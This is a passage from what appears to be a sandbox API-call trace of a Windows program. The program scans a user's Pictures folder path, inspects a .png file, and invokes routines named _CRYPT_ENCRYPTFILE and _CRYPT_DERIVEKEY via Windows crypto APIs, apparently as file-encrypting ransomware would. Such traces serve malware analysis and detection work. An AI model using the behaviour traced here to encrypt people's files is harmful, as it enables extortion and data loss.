(HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rULw.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.106] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0190.106] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0190.107] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.107] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.107] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0190.107] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.107] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.107] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0190.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.108] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a73a50, ftCreationTime.dwHighDateTime=0x1d5e3c6, ftLastAccessTime.dwLowDateTime=0x11687980, ftLastAccessTime.dwHighDateTime=0x1d5dc33, ftLastWriteTime.dwLowDateTime=0x11687980, ftLastWriteTime.dwHighDateTime=0x1d5dc33, nFileSizeHigh=0x0, nFileSizeLow=0x26c2, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="rULw.png", cAlternateFileName="")) returned 0x90ae18 [0190.108] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.108] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.108] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0190.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0190.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0190.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0190.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.109] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0190.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.110] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0190.110] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.110] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0190.110] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.111] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.111] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.111] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.111] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.111] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.111] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.111] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8dee70 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0190.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0190.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 